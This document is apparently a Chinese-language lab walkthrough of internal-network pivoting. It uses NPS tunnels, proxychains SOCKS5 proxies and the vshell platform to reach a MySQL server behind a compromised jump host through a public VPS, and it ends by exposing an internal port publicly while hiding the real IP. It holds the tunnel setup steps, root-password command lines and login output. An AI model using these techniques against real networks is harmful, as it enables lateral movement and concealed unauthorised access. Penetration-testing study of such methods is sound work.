NPS-内网攻防信息打点工具 #
实现目标-通过本机访问别人的localhost3306数据库 #
本地启动nps服务端 默认打开8080端口web服务 账号admin密码123 可以在conf里面修改密码
登录后创建一个客户端复制连接口令
把下面命令复制给客户端的一台跳板主机
运行刷新连接变成了就绪我们点击隧道创建一个本地的6666就是对应对方IP的3306 对应数据库服务
访问查看发现可以直接连接
后续使用Socket建立一个节点也可以
实现目标通过socks建立节点打通内网 #
先安装代理工具linux
# Debian/Ubuntu
sudo apt-get install proxychains
# CentOS/RHEL
sudo yum install proxychains-ng
如果是windows 用proxfier
这里nps用的socks5
使用
# 注释掉原有示例,添加你的代理
/etc/proxychains.conf 文件
设置
socks5 127.0.0.1 1080 # SOCKS5 代理
# http 127.0.0.1 8080 # HTTP 代理(根据需要选择)
设置通过socks本身9999端口
NPS设置界面为9999和本地吻合
使用proxychains4 curl xx 代理来运行 不要直接运行
可以看到成功访问我们的内网 上面是没用的访问不到
nps改默认密码
修改 nps.conf 文件把默认密码123修改即可
内网不出网络的通过NPS转发端口实现 #
首先网段是内网192.168.22.131 被拿shell跳板机 192.168.22.130 mysql服务机器
本地不能访问192.168.22.0网段
ping 192.168.22.130
正在 Ping 192.168.22.130 具有 32 字节的数据:
请求超时。
首先连接nps和上面一样
这里转发端口设置是我们要的内网端口它会自动吧当前客户端当成跳板
然后我们本地通过VPS来登录测试
可以发现不能连接的也可以转发了
mysql -h 116.62.32.64 -P 33306 -u root -proot
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 32
Server version: 5.5.5-10.6.7-MariaDB-3 Debian buildd-unstable
Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
mysql>
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
4 rows in set (0.12 sec)
mysql>
vps上面测试 vps要用127.0.0.1 TCP的
mysql -P 33306 -u root -proot
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
[root@iZbp156z1grx9b9s1305p0Z ~]# mysql -h localhost -P 33306 -u root -proot
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
[root@iZbp156z1grx9b9s1305p0Z ~]# mysql -h localhost -P 33306 -u root -p
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
[root@iZbp156z1grx9b9s1305p0Z ~]# mysql -h 127.0.0.1 -P 33306 -u root -proot
showWelcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 33
Server version: 10.6.7-MariaDB-3 Debian buildd-unstable
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
4 rows in set (0.09 sec)
MariaDB [(none)]>
实现通过VSHELL平台设置端口映射 #
通过vshell转发内网端口通过跳板 #
上线了后转发即可
C:\Users\22118>mysql -h 127.0.0.1 -P 33066 -u root -p
Enter password: ****
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 34
Server version: 5.5.5-10.6.7-MariaDB-3 Debian buildd-unstable
Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
4 rows in set (0.00 sec)
mysql>
基于端口转发技术挂载在公网 #
实现隐藏真实IP只有转发服务器IP
把8084转发到内网的8084干到了公网上
